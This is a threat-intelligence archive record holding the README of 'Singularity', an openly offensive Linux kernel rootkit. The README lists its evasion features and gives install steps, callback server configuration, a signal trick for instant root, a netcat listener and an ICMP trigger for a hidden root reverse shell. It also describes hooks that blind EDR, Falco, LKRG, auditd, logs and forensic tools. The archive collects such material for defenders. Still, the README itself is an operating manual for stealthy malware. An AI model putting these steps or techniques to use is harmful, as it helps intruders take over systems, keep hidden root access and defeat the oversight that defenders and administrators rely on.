{
	"id": "83eec287-b63c-4932-9a25-43836df2fcd4",
	"created_at": "2026-04-06T00:12:34.487237Z",
	"updated_at": "2026-04-10T13:11:32.508347Z",
	"deleted_at": null,
	"sha1_hash": "f8375217a2f8cc3d5f7cb1470e5f2f4553595be0",
	"title": "GitHub - MatheuZSecurity/Singularity: Stealthy Linux Kernel Rootkit for modern kernels (6x)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 617221,
	"plain_text": "GitHub - MatheuZSecurity/Singularity: Stealthy Linux Kernel\r\nRootkit for modern kernels (6x)\r\nBy MatheuZSecurity\r\nArchived: 2026-04-05 16:03:34 UTC\r\n\"Shall we give forensics a little work?\"\r\nSingularity is a powerful Linux Kernel Module (LKM) rootkit designed for modern 6.x kernels. It provides\r\ncomprehensive stealth capabilities through advanced system call hooking via ftrace infrastructure.\r\nFull Research Article (outdated version): Singularity: A Final Boss Linux Kernel Rootkit\r\nEDR Evasion Case Study: Bypassing Elastic EDR with Singularity\r\nPOC Video: Singularity vs eBPF security tools: Singularity vs eBPF security tools\r\nBreaking eBPF Security with Singularity hooks: Breaking eBPF\r\nWhat is Singularity?\r\nSingularity is a sophisticated rootkit that operates at the kernel level, providing:\r\nhttps://github.com/MatheuZSecurity/Singularity\r\nPage 1 of 16\n\nProcess Hiding: Make any process completely invisible to the system\r\nFile \u0026 Directory Hiding: Conceal files using pattern matching\r\nNetwork Stealth: Hide TCP/UDP connections, ports, and conntrack entries\r\nPrivilege Escalation: Signal-based instant root access\r\nLog Sanitization: Filter kernel logs and system journals in real-time\r\nSelf-Hiding: Remove itself from module lists and system monitoring\r\nRemote Access: ICMP-triggered reverse shell with automatic hiding\r\nAnti-Detection: Evade eBPF-based runtime security tools (Falco, Tracee), bypass Linux Kernel Runtime\r\nGuard (LKRG), and prevent io_uring bypass attempts\r\nAudit Evasion: Drop audit messages for hidden processes at netlink level with statistics tracking and\r\nsocket inode filtering\r\nMemory Forensics Evasion: Filter /proc/kcore, /proc/kallsyms, /proc/vmallocinfo\r\nCgroup Filtering: Filter hidden PIDs from cgroup.procs\r\nSyslog Evasion: Hook do_syslog to filter klogctl() kernel ring buffer access\r\nDebugfs Evasion: Filter output of tools like debugfs that read raw block 
devices\r\nConntrack Filtering: Hide connections from /proc/net/nf_conntrack and netlink\r\nSOCK_DIAG/NETFILTER queries\r\nSELinux Evasion: Automatic SELinux enforcing mode bypass on ICMP trigger\r\nLKRG Bypass: Evade Linux Kernel Runtime Guard detection mechanisms\r\neBPF Security Bypass: Hide processes from eBPF-based runtime security tools (Falco, Tracee)\r\nFeatures\r\nSignal-based privilege elevation (kill -59)\r\nComplete process hiding from /proc and monitoring tools\r\nPattern-based filesystem hiding for files and directories\r\nNetwork connection concealment from netstat, ss, conntrack, and packet analyzers\r\nAdvanced netlink filtering (SOCK_DIAG, NETFILTER/conntrack messages)\r\nReal-time kernel log filtering for dmesg, journalctl, and klogctl\r\nModule self-hiding from lsmod and /sys/module\r\nAutomatic kernel taint flag normalization\r\nBPF data filtering to prevent eBPF-based detection\r\nio_uring protection against asynchronous I/O bypass\r\nLog masking for kernel messages and system logs\r\nEvasion of standard rootkit detectors (unhide, chkrootkit, rkhunter)\r\nAutomatic child process tracking and hiding via tracepoint hooks\r\nMulti-architecture support (x64 + ia32)\r\nNetwork packet-level filtering with raw socket protection\r\nProtection against all file I/O variants (read, write, splice, sendfile, tee, copy_file_range)\r\nNetlink-level audit message filtering with statistics tracking to evade auditd detection\r\nSocket inode tracking for comprehensive network hiding\r\nCgroup PID filtering to prevent detection via /sys/fs/cgroup/*/cgroup.procs\r\nTaskStats netlink blocking to prevent PID enumeration\r\n/proc/kcore filtering to evade memory forensics tools (Volatility, crash, gdb)\r\ndo_syslog hook to filter klogctl() and prevent kernel ring buffer leaks\r\nBlock device output filtering to evade debugfs and similar disk forensics tools\r\njournalctl -k output filtering via write 
hook\r\nSELinux enforcing mode bypass capability for ICMP-triggered shells\r\nLKRG integrity checks bypass for hidden processes\r\nFalco event hiding via BPF ringbuffer and perf event interception\r\nInstallation\r\nPrerequisites\r\nLinux kernel 6.x\r\nKernel headers for your running kernel\r\nGCC and Make\r\nRoot access\r\nQuick Install\r\ncd /dev/shm\r\ngit clone https://github.com/MatheuZSecurity/Singularity\r\ncd Singularity\r\nsudo bash setup.sh\r\ncd ..\r\nThat's it. The module automatically:\r\nHides itself from lsmod, /proc/modules, /sys/module\r\nClears kernel taint flags\r\nFilters sensitive strings from dmesg, journalctl -k, klogctl\r\nStarts protecting your hidden files and processes\r\nImportant Notes\r\nThe module automatically hides itself after loading\r\nThere is no unload feature - reboot required to remove\r\nTest in a VM first - cannot be removed without restarting\r\nConfiguration\r\nSet Your Server IP and Port\r\nEdit include/core.h :\r\n#define YOUR_SRV_IP \"192.168.1.100\" // Change this to your server IP\r\n#define YOUR_SRV_IPv6 { .s6_addr = { [15] = 1 } } // IPv6 if needed\r\nEdit modules/icmp.c :\r\n#define SRV_PORT \"8081\" // Change this to your desired port\r\nEdit modules/bpf_hook.c :\r\n#define HIDDEN_PORT 8081 // Must match SRV_PORT\r\nEdit modules/hiding_tcp.c :\r\n#define PORT 8081 // Must match SRV_PORT\r\nImportant: All port definitions must match for proper network hiding and ICMP reverse shell functionality.\r\nUsage\r\nHide Processes\r\n# Hide current shell\r\nkill -59 $$\r\n# Hide specific process\r\nkill -59 \u003cPID\u003e\r\nProcess will be invisible to ps, top, htop, /proc, and all monitoring tools. 
All child processes are automatically\r\ntracked and hidden.\r\nHide Files \u0026 Directories\r\nFiles matching your configured patterns are automatically hidden:\r\nmkdir singularity\r\necho \"secret\" \u003e singularity/data.txt\r\n# Invisible to ls, find, locate\r\nls -la | grep singularity\r\n# (no output)\r\n# But you can still access it\r\ncat singularity/data.txt\r\n# secret\r\n# cd is blocked for security\r\ncd singularity\r\n# bash: cd: singularity: No such file or directory\r\nBecome Root\r\nSignal-based method:\r\nkill -59 $$\r\nid # uid=0(root)\r\nHide Network Connections\r\nConnections on your configured port (default: 8081) are automatically hidden:\r\nnc -lvnp 8081\r\n# Invisible to all monitoring\r\nss -tulpn | grep 8081 # (no output)\r\nnetstat -tulpn | grep 8081 # (no output)\r\nlsof -i :8081 # (no output)\r\ncat /proc/net/nf_conntrack | grep 8081 # (no output)\r\n# Even advanced netlink queries are filtered\r\nss -tapen | grep 8081 # (no output)\r\nconntrack -L | grep 8081 # (no output)\r\nPackets are dropped at raw socket level (tpacket_rcv) and hidden from:\r\n/proc/net/* interfaces (tcp, tcp6, udp, udp6)\r\n/proc/net/nf_conntrack\r\nNetlink SOCK_DIAG queries (used by ss, lsof)\r\nNetlink NETFILTER/conntrack messages (used by conntrack tool)\r\nICMP Reverse Shell\r\nTrigger a hidden reverse shell remotely with automatic SELinux bypass:\r\n1. Start listener:\r\nnc -lvnp 8081 # Use your configured port\r\n2. Send ICMP trigger:\r\nsudo python3 scripts/trigger.py \u003ctarget_ip\u003e\r\n3. 
Receive root shell (automatically hidden with all child processes, SELinux enforcing mode bypassed if active)\r\nProtection Mechanisms\r\nFtrace Control Protection\r\nAll attempts to disable ftrace are silently intercepted and blocked:\r\necho 0 \u003e /proc/sys/kernel/ftrace_enabled # Appears successful but does nothing\r\nProtected syscalls: write, writev, pwrite64, pwritev, pwritev2, sendfile, sendfile64, splice, vmsplice, tee,\r\ncopy_file_range, io_uring_enter (with intelligent per-PID caching)\r\nBPF Syscall Filtering\r\nThe bpf_hook.c module implements a sophisticated anti-detection system against eBPF-based security tools.\r\nRather than blocking BPF syscalls entirely (which would be a detection fingerprint), it selectively filters data at\r\nthe kernel level to make hidden processes and connections invisible to eBPF programs.\r\nStrategy: Intercept data collection and reporting functions used by eBPF programs, not the BPF syscall itself.\r\nThis allows legitimate eBPF tools to run normally while preventing them from seeing hidden resources.\r\nProtected resources:\r\nHidden processes and their entire process tree (up to 10 parent levels)\r\nNetwork connections on configured port (default: 8081) or to configured IP address\r\nSocket inodes associated with hidden processes\r\nInterception points:\r\nIterator execution (process/socket enumeration)\r\nRingbuffer operations (event submission to userspace)\r\nBPF map operations (PID lookups and insertions)\r\nPerf event output (legacy eBPF event delivery)\r\nSeq file writes (output formatting)\r\nProgram execution (context-based filtering)\r\nThis approach defeats eBPF security tools without triggering alerts that would come from blocking BPF\r\noperations entirely.\r\nio_uring Protection\r\nProtection against io_uring bypass in ftrace_enabled and tracing_on attempts with intelligent caching (1 second\r\ncache per PID to prevent repeated process 
scanning and reduce overhead)\r\nLog Sanitization\r\nReal-time filtering of sensitive strings from all kernel log interfaces:\r\nInterface Hook Status\r\ndmesg read hook on /proc/kmsg Filtered\r\njournalctl -k write hook (output filtering) Filtered\r\nklogctl() / syslog() do_syslog hook Filtered\r\n/sys/kernel/debug/tracing/* read hook Filtered\r\n/var/log/kern.log , syslog , auth.log read hook Filtered\r\n/proc/kallsyms , /proc/kcore , /proc/vmallocinfo read hook Filtered\r\n/proc/net/nf_conntrack read hook Filtered\r\nFiltered keywords: taint, journal, singularity, Singularity, matheuz, zer0t, kallsyms_lookup_name, obliviate, hook,\r\nhooked_, constprop, clear_taint, ftrace_helper, fh_install, fh_remove\r\nNote: Audit messages for hidden PIDs are dropped at netlink level with statistics tracking\r\n(get_blocked_audit_count, get_total_audit_count)\r\nDisk Forensics Evasion\r\nSingularity hooks the write syscall to detect and filter output from disk forensics tools:\r\nHow it works:\r\n1. Detects if process has a block device open ( /dev/sda , /dev/nvme0n1 , etc)\r\n2. Detects debugfs-style output patterns (inode listings, filesystem metadata)\r\n3. 
Sanitizes hidden patterns in-place (replaces with spaces to maintain buffer size/checksums)\r\n# Hidden files are invisible even to raw disk analysis\r\ndebugfs /dev/sda3 -R 'ls -l /home/user/singularity'\r\n# (spaces where \"singularity\" was)\r\n# The pattern is sanitized in the output buffer\r\n# Checksums remain valid, no corruption\r\nDetected patterns:\r\ndebugfs: prefix\r\nInode listings with parentheses\r\nInode count: , Block count: , Filesystem volume name:\r\nFilesystem UUID: , e2fsck , Inode:\r\nProcess Hiding Implementation\r\nComplete hiding from syscalls and kernel interfaces:\r\n/proc/[pid]/* (openat, readlinkat blocked)\r\ngetdents, getdents64 (directory listing filtered)\r\nstat, lstat, statx, newfstatat (metadata hidden)\r\nkill with signal 0 (returns ESRCH)\r\ngetsid, getpgid, getpgrp (returns ESRCH)\r\nsched_getaffinity, sched_getparam, sched_getscheduler, sched_rr_get_interval (returns ESRCH)\r\ngetpriority (returns ESRCH)\r\nsysinfo (process count adjusted)\r\npidfd_open (returns ESRCH)\r\nTaskStats netlink queries (returns ESRCH)\r\nCgroup PIDs filtered from cgroup.procs\r\nChild processes automatically tracked via sched_process_fork tracepoint hook.\r\nLKRG Bypass\r\nSingularity implements comprehensive evasion against Linux Kernel Runtime Guard:\r\nBypassed checks:\r\nProcess credential validation (p_cmp_creds)\r\nTask structure integrity (p_cmp_tasks)\r\nControl Flow Integrity validation (p_ed_pcfi_validate_sp, p_ed_enforce_pcfi)\r\nKernel integrity checks (p_check_integrity)\r\nExploit detection subsystem (p_exploit_detection_init)\r\nUser-mode helper tracking (p_call_usermodehelper_entry, p_call_usermodehelper_exec_entry)\r\nTask dumping and enumeration (p_dump_task_f, ed_task_add)\r\nKprobe ftrace handler interception\r\nFeatures:\r\nAutomatic LKRG detection and hook installation\r\nProcess lineage verification (hides entire process trees up to 64 levels deep)\r\nUMH 
bypass for reverse shell operations\r\nModule notification system for detecting LKRG loading\r\nHidden processes are invisible to all LKRG integrity verification mechanisms.\r\nFalco Bypass\r\nSingularity implements a comprehensive anti-EDR defense system that prevents eBPF-based security tools from\r\ndetecting hidden processes and network connections. The protection works by intercepting kernel functions that\r\neBPF programs use to collect and report data.\r\nProtected against:\r\nFalco (event-based runtime security)\r\nTracee (security tracing)\r\nbpftool and ss with BPF backend\r\nMulti-layer interception:\r\n1. Iterator filtering (bpf_iter_run_prog)\r\nFilters sockets on hidden port from TCP/UDP iterators\r\nHides processes and their children from task iterators\r\nPrevents detection via ss and process enumeration tools\r\n2. Ringbuffer event blocking (bpf_ringbuf_output, bpf_ringbuf_reserve, bpf_ringbuf_submit)\r\nDetects Falco event structures by analyzing header format\r\nBlocks event allocation, submission, and output for hidden PIDs\r\nPrevents syscall events from reaching Falco userspace agent\r\n3. BPF map manipulation (bpf_map_lookup_elem, bpf_map_update_elem)\r\nReturns NULL when eBPF looks up hidden PIDs in maps\r\nSilently drops map insertions where key is a hidden PID\r\nPrevents eBPF security tools from tracking hidden processes\r\n4. Perf event suppression (perf_event_output, perf_trace_run_bpf_submit)\r\nBlocks perf-based event submission from hidden processes\r\nPrevents legacy eBPF tools from receiving trace data\r\n5. Seq file filtering (bpf_seq_write, bpf_seq_printf)\r\nScans output data for hidden PIDs before writing\r\nPrevents leakage via /proc interfaces used by eBPF iterators\r\n6. 
Program execution control (__bpf_prog_run)\r\nBlocks eBPF program execution when running in hidden process context\r\nPrevents any eBPF-based monitoring of hidden process internals\r\nSocket and connection hiding:\r\nCaches hidden IP address for performance\r\nFilters sockets based on configured port and configured IP\r\nHides both IPv4 and IPv6 connections\r\nWorks at iterator level (before data reaches eBPF programs)\r\nProcess lineage tracking:\r\nTraces parent process chain up to 10 levels deep\r\nAutomatically hides all descendants of hidden processes\r\nEnsures child processes spawned after hiding remain invisible\r\nHidden processes and connections generate zero events visible to eBPF security tools.\r\nBypassed Security Tools\r\nProcess Monitoring: ps, top, htop, atop, pidof\r\nFilesystem: ls, find, locate, stat, lstat, readlink, tree\r\nDisk Forensics: debugfs, e2fsck (output filtered via write hook)\r\nMemory Forensics: Volatility, crash, gdb (via /proc/kcore filtering)\r\nNetwork: netstat, ss, lsof, tcpdump, wireshark, conntrack, nload, iftop, /proc/net/*\r\nLogs \u0026 Traces: dmesg, journalctl, klogctl, strace, ltrace, ftrace, perf\r\nRootkit Detectors: unhide, chkrootkit, rkhunter, OSSEC\r\nModule Detection: lsmod, modinfo, /sys/module, /proc/modules, kmod\r\nKernel Security: LKRG (Linux Kernel Runtime Guard)\r\neBPF Security Tools:\r\nFalco (runtime security monitoring)\r\nTracee (security tracing)\r\nbpftrace, bpftool (when used for monitoring)\r\nEDR/Monitoring: io_uring-based monitors, some Linux EDR solutions, auditd\r\nSyscall Hooks\r\nSyscall/Function Module Purpose\r\ngetdents, getdents64 hiding_directory.c Filter directory entries, hide PIDs\r\nstat, lstat, newstat, newlstat, statx, newfstatat hiding_stat.c Hide file metadata, adjust nlink\r\ngetpriority hiding_stat.c\r\nHide priority queries for hidden\r\nPIDs\r\nopenat open.c\r\nBlock access to 
hidden\r\n/proc/[pid]\r\nreadlinkat hiding_readlink.c Block symlink resolution\r\nchdir hiding_chdir.c Prevent cd into hidden dirs\r\nread, pread64, readv, preadv clear_taint_dmesg.c\r\nFilter kernel logs, kcore,\r\nkallsyms, cgroup PIDs,\r\nnf_conntrack\r\ndo_syslog clear_taint_dmesg.c\r\nFilter klogctl()/syslog() kernel\r\nring buffer\r\nsched_debug_show clear_taint_dmesg.c Filter scheduler debug output\r\nwrite, writev, pwrite64, pwritev, pwritev2 hooks_write.c\r\nBlock ftrace control + filter disk\r\nforensics + filter journalctl\r\noutput\r\nsendfile, sendfile64, copy_file_range hooks_write.c\r\nBlock file copies to protected\r\nfiles\r\nsplice, vmsplice, tee hooks_write.c\r\nBlock pipe-based writes to\r\nprotected files\r\nio_uring_enter hooks_write.c\r\nBlock async I/O bypass with PID\r\ncaching\r\nkill become_root.c Root trigger + hide processes\r\ngetsid, getpgid, getpgrp become_root.c Returns ESRCH for hidden PIDs\r\nsched_getaffinity, sched_getparam,\r\nsched_getscheduler, sched_rr_get_interval\r\nbecome_root.c Returns ESRCH for hidden PIDs\r\nsysinfo become_root.c Adjusts process count\r\npidfd_open become_root.c Returns ESRCH for hidden PIDs\r\ntcp4_seq_show, tcp6_seq_show hiding_tcp.c\r\nHide TCP connections from\r\n/proc/net\r\nudp4_seq_show, udp6_seq_show hiding_tcp.c\r\nHide UDP connections from\r\n/proc/net\r\ntpacket_rcv hiding_tcp.c Drop packets at raw socket level\r\nrecvmsg, recvfrom audit.c\r\nFilter netlink SOCK_DIAG and\r\nNETFILTER messages\r\nnetlink_unicast audit.c\r\nDrop audit messages for hidden\r\nPIDs\r\naudit_log_start audit.c\r\nBlock audit log creation for\r\nhidden processes\r\nbpf bpf_hook.c\r\nFilter eBPF operations for hidden\r\nPIDs\r\nbpf_iter_run_prog bpf_hook.c\r\nHide hidden processes from 
BPF\r\niterators\r\nbpf_seq_write, bpf_seq_printf bpf_hook.c Filter BPF seq file output\r\nbpf_ringbuf_output, bpf_ringbuf_reserve,\r\nbpf_ringbuf_submit\r\nbpf_hook.c Filter Falco events via ringbuffer\r\nbpf_map_lookup_elem, bpf_map_update_elem bpf_hook.c Filter BPF map operations\r\nperf_event_output, perf_trace_run_bpf_submit bpf_hook.c\r\nFilter perf events for hidden\r\nprocesses\r\n__bpf_prog_run bpf_hook.c Filter BPF program execution\r\nicmp_rcv icmp.c\r\nICMP-triggered reverse shell\r\nwith SELinux bypass\r\ntaskstats_user_cmd task.c\r\nBlock TaskStats queries for\r\nhidden PIDs\r\nsched_process_fork (tracepoint) trace.c Track child processes\r\nkprobe_ftrace_handler lkrg_bypass.c Bypass LKRG kprobe detection\r\np_cmp_creds, p_cmp_tasks lkrg_bypass.c Bypass LKRG credential checks\r\np_ed_pcfi_validate_sp, p_ed_enforce_pcfi lkrg_bypass.c Bypass LKRG CFI validation\r\np_check_integrity lkrg_bypass.c Bypass LKRG integrity checks\r\np_dump_task_f, ed_task_add lkrg_bypass.c\r\nHide from LKRG task\r\nenumeration\r\np_call_usermodehelper_entry,\r\np_call_usermodehelper_exec_entry\r\nlkrg_bypass.c Bypass LKRG UMH tracking\r\np_exploit_detection_init lkrg_bypass.c Bypass LKRG exploit detection\r\ntainted_mask (kthread) reset_tainted.c Clear kernel taint flags\r\nmodule_hide_current hide_module.c\r\nRemove from module lists and\r\nsysfs\r\nMulti-Architecture Support: x86_64 ( __x64_sys_* ) and ia32 ( __ia32_sys_* , __ia32_compat_sys_* )\r\nTested Kernel Versions\r\nKernel Version Distribution Status Notes\r\n6.8.0-79-generic Ubuntu 22.04 / 24.04 Stable Primary development environment\r\n6.12.0-174.el10.x86_64 CentOS Stream 10 Stable RHEL-based kernel\r\n6.12.48+deb13-amd64 Debian 13 (Trixie) Stable Debian kernel\r\n6.17.8-300.fc43.x86_64 Fedora 43 Stable SELinux enforcing bypass validated\r\n6.17.0-8-generic Ubuntu 25.10 Stable Newer generic kernel, fully 
functional\r\n6.14.0-37-generic Ubuntu 24.04 Stable LKRG and Falco bypass validated\r\n6.12.25-amd64 Kali Linux Stable Kali 6.12.25-1kali1\r\nThe Plot\r\nUnfortunately for some...\r\nEven with all these filters, protections, and hooks, there are still ways to detect this rootkit.\r\nBut if you're a good forensic analyst, DFIR professional, or malware researcher, I'll let you figure it out on your\r\nown.\r\nI won't patch for this, because it will be much more OP ;)\r\nCredits\r\nSingularity was created by MatheuZSecurity (Matheus Alves)\r\nLinkedIn: mathsalves\r\nDiscord: kprobe\r\nJoin Rootkit Researchers: Discord - https://discord.gg/66N5ZQppU7\r\nCode References\r\nfuxSocy\r\nAdrishya\r\nMatheuZSecurity/Rootkit\r\nResearch Inspiration\r\nKoviD\r\nBasilisk\r\nGOAT Diamorphine rootkit\r\nContributing\r\nSubmit pull requests for improvements\r\nReport bugs via GitHub issues\r\nSuggest new evasion techniques\r\nShare detection methods (for research)\r\nFound a bug? Open an issue or contact me on Discord: kprobe\r\nFOR EDUCATIONAL AND RESEARCH PURPOSES ONLY\r\nSingularity was created as a research project to explore the limits of kernel-level stealth techniques. The goal is to\r\nanswer one question: \"How far can a rootkit hide if it manages to infiltrate and load into a system?\"\r\nThis project exists to:\r\nPush the boundaries of offensive security research\r\nHelp defenders understand what they're up against\r\nProvide a learning resource for kernel internals and evasion techniques\r\nContribute to the security community's knowledge base\r\nI am not responsible for any misuse of this software. If you choose to use Singularity for malicious purposes,\r\nthat's on you. This tool is provided as-is for research, education, and authorized security testing only.\r\nTest only on systems you own or have explicit written permission to test. 
Unauthorized access to computer\r\nsystems is illegal in most jurisdictions.\r\nBe a researcher, not a criminal.\r\nSource: https://github.com/MatheuZSecurity/Singularity",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://github.com/MatheuZSecurity/Singularity"
	],
	"report_names": [
		"Singularity"
	],
	"threat_actors": [],
	"ts_created_at": 1775434354,
	"ts_updated_at": 1775826692,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f8375217a2f8cc3d5f7cb1470e5f2f4553595be0.pdf",
		"text": "https://archive.orkl.eu/f8375217a2f8cc3d5f7cb1470e5f2f4553595be0.txt",
		"img": "https://archive.orkl.eu/f8375217a2f8cc3d5f7cb1470e5f2f4553595be0.jpg"
	}
}